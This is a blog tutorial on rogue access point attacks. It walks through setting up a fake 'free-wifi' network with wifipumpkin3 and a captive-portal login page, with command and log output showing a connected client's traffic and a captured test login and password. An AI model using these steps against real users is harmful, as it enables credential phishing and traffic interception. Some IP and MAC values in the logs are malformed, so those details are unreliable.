DEV Community

Cover image for “Scary” Rogue Access Point attack
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Updated on

“Scary” Rogue Access Point attack

When going to McDonald's, a restaurant or even a regular coffee shop, there are times when we can take advantage of their open wifi network. This is especially useful when we plan to stay longer and work on our projects. This carries quite a few risks. An example is the rogue access point attack, to which this post is dedicated.

What is an access point?

To provide Internet connectivity in the home environment, most of us use a router, which is a wired or wireless way to distribute the signal used by receivers in computers. The router creates its own home network while assigning individual ip addresses to the equipment. Depending on the router used, it has different interfaces.

Access point, on the other hand, is the part of the router (device) without which we would not be able to connect to the network. It has the same network interfaces as the router - the first allows communication with the Internet via a network cable and the router, the second allows the connection of further user equipment to the network.

A rogue access point is thus an access point installed on a network without the permission of its owner. An attacker who owns a fake access point is able to intercept requests, which poses the threat of stealing sensitive user data, among other things.

wifipumpkin3

                            .,'                          
                        .''.'                
                        .' .'                 
            _.ood0Pp._ ,'  `.~ .q?00doo._          
        .od00Pd0000Pdb._. . _:db?000b?000bo.   
     .?000Pd0000Pd0000PdbMb?0000b?000b?0000b.     
    .d0000Pd0000Pd0000Pd0000b?0000b?000b?0000b.      
    d0000Pd0000Pd00000Pd0000b?00000b?0000b?000b.     
    00000Pd0000Pd0000Pd00000b?00000b?0000b?0000b   
    ?0000b?0000b?  WiFiPumpkin3  00Pd0000Pd0000P    
    ?0000b?0000b?0000b?00000Pd00000Pd0000Pd000P     
    `?0000b?0000b?0000b?0000Pd0000Pd0000Pd000P'  
     `?000b?0000b?000b?0000Pd000Pd0000Pd000P     
        `~?00b?000b?000b?000Pd00Pd000Pd00P'    
            `~?0b?0b?000b?0Pd0Pd000PdP~'  
Enter fullscreen mode Exit fullscreen mode

Wifipumpkin3, is a tool to carry out min. the attack described above. Let's check how.

After installing and running the proxies command inside the tool, we get information about available proxies.

 Proxy        | Active   |   Port | Description                                                        --------------+----------+--------+-------------------------------------------------------              captiveflask | False    |     80 | Allow block Internet access for users until they o...               noproxy      | False    |     80 | Runnning without proxy redirect traffic                             pumpkinproxy | True     |   8080 | Transparent proxies that you can use to intercept ...    
Enter fullscreen mode Exit fullscreen mode

The tools provide three possible proxy settings. The first ensures that users can only access the Internet when they enter the login page (where we can try to force the user to enter credentials). The second disables the proxy, and the last option is enabled by default, and it allows us to capture traffic and display it in a panel specially created for this purpose. So let's try using the captiveflask proxy. To do this, use the command:

wp3 > set proxy captiveflask true
Enter fullscreen mode Exit fullscreen mode

After typing proxies again, you will notice that captiveflask has been activated along with the transitive portal (captive portal) DarkLogin.

wp3 > proxies

[*] Available proxies:
======================

 Proxy        | Active   |   Port | Description
--------------+----------+--------+-------------------------------------------------------
 captiveflask | True     |     80 | Allow block Internet access for users until they o...
 noproxy      | False    |     80 | Runnning without proxy redirect traffic
 pumpkinproxy | False    |   8080 | Transparent proxies that you can use to intercept ...



[*] Captive Portal plugins:
===========================

 Name      | Active
-----------+----------
 DarkLogin | True
 FlaskDemo | False
 Login_v4  | False
 loginPage | False
Enter fullscreen mode Exit fullscreen mode

What does this mean for us? That a template named DarkLogin will be used. To set a different template, we will type:

wp3 > set captiveflask.
captiveflask.DarkLogin                          captiveflask.FlaskDemo.ptBr
captiveflask.FlaskDemo                          captiveflask.force_redirect_sucessful_template
captiveflask.FlaskDemo.Default                  captiveflask.loginPage
captiveflask.FlaskDemo.En                       captiveflask.Login_v4
Enter fullscreen mode Exit fullscreen mode

Using the tab to display the possible options. In our example, we choose to:

wp3 > set captiveflask.loginPage true
Enter fullscreen mode Exit fullscreen mode

Let's move on to access points. We can see our available, configured access point with the ap command.

wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID           |   Channel | Interface   | Status      | Security
-------------------+----------------+-----------+-------------+-------------+------------
 AC:B6:85:33:16:7C | WiFi Pumpkin 3 |        11 | None        | not Running | false
Enter fullscreen mode Exit fullscreen mode

Let's change its name from WiFi Pumpkin 3 to free-wifi.


wp3 > set ssid free-wifi
wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID      |   Channel | Interface   | Status      | Security
-------------------+-----------+-----------+-------------+-------------+------------
 AC:B6:85:33:16:7C | free-wifi |        11 | None        | not Running | false
Enter fullscreen mode Exit fullscreen mode

As you can see, the interface for our access point is not set. We can check the available interfaces by running the ifconfig command. In our case, we will use the wlo1 interface.

wp3 > set interface wlo1
wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID      |   Channel | Interface   | Status      | Security
-------------------+-----------+-----------+-------------+-------------+------------
 BC:F6:85:03:36:5B | free-wifi |        11 | wlo1        | not Running | false
Enter fullscreen mode Exit fullscreen mode

With the configuration set, we can proceed to expose the access point to the world.

wp3 > start
Enter fullscreen mode Exit fullscreen mode

As you can see, it is possible to connect to the newly created wifi network.

access point attack

After joining, the user should be taken to the login panel.

access point attack

At the same time in the terminal, we got information about the victim's connection to our access point along with its intercepted requests.

[*] 81:15:72:fh:06:86 client join the AP 
 [  pydhcp_server  ] 21:02:24  - SEND to ('0.0.0.0', 68):
::Header::
    op: BOOTREPLY
    hwmac: MAC('81:15:72:fh:06:86')
    flags: 
    hops: 0
    secs: 0
    xid: 105676842
    siaddr: IPv4Address('0.0.0.0')
    giaddr: IPv4Address('0.0.0.0')
    ciaddr: IPv4Address('0.0.0.0')
    yiaddr: IPv4Address('10.0.0.21')
    sname: ''
    file: ''

::Body::
    [X][001] subnet_mask: IPv4Address('255.0.0.0')
    [X][003] router: [IPv4Address('10.0.0.1'), IPv4Address('8.8.8.8')]
    [X][006] domain_name_servers: [IPv4Address('10.0.0.1')]
    [ ][012] hostname: 'DESKTOP-9P879SS'
    [X][051] ip_address_lease_time: 7200
    [-][053] dhcp_message_type: DHCP_ACK
    [X][054] server_identifier: IPv4Address('10.0.0.1')
    [ ][081] client_fqdn: '\x00\x00\x00DESKTOP-9Ph29aS'

 [  captiveflask  ] 21:02:59  - 10.0.0.21 - - [05/Nov/2021 21:02:58] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:02:59  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:02:59  - 10.0.0.21 - - [05/Nov/2021 21:02:59] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:02:59  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:00  - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:00  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:00  - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:00  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:37  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET / HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:37  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/ 
 [  captiveflask  ] 21:03:37  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -

 [  sniffkin3  ] 21:03:37  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/css/bootstrap.min.css 
 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/jquery-1.11.1.min.js HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/bootstrap.min.js HTTP/1.1" 200 -

 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/jquery-1.11.1.min.js 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/bootstrap.min.js 
 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/images/avatar_2x.png HTTP/1.1" 200 -

 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /favicon.ico HTTP/1.1" 404 -

 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/images/avatar_2x.png 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/favicon.ico 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -

 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1 
 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - " 302 -

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -
Enter fullscreen mode Exit fullscreen mode

After the customer enters the sensitive data and submits the form, the console will show us:

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:55  - {'10.0.0.21': {'login': 'bugspace@bugspace.pl', 'password': 'bugspacepassword'}} 

[*] CaptiveFlask credentials:
=============================

 IP        | Login                | Password
-----------+----------------------+------------------
 10.0.0.21 | bugspace@bugspace.pl | bugspacepassword


 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
                     payload: login=bugspace%40bugspace.pl&password=bugspacepassword
                     Username: bugspace%40bugspace.pl
                     Password: bugspacepassword

 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/ 
 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  captiveflask  ] 21:03:56  - 10.0.0.21 - - [05/Nov/2021 21:03:55] "POST /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET / HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -
Enter fullscreen mode Exit fullscreen mode

Thus, we received a user login and password.

Sources

https://github.com/swagkarna/wifi-pumpkin-v3.0\
https://www.khanacademy.org/computing/computers-and-internet/xcae6f4a7ff015e7d:online-data-security/xcae6f4a7ff015e7d:cyber-attacks/a/rogue-access-points-mitm-attacks

Top comments (0)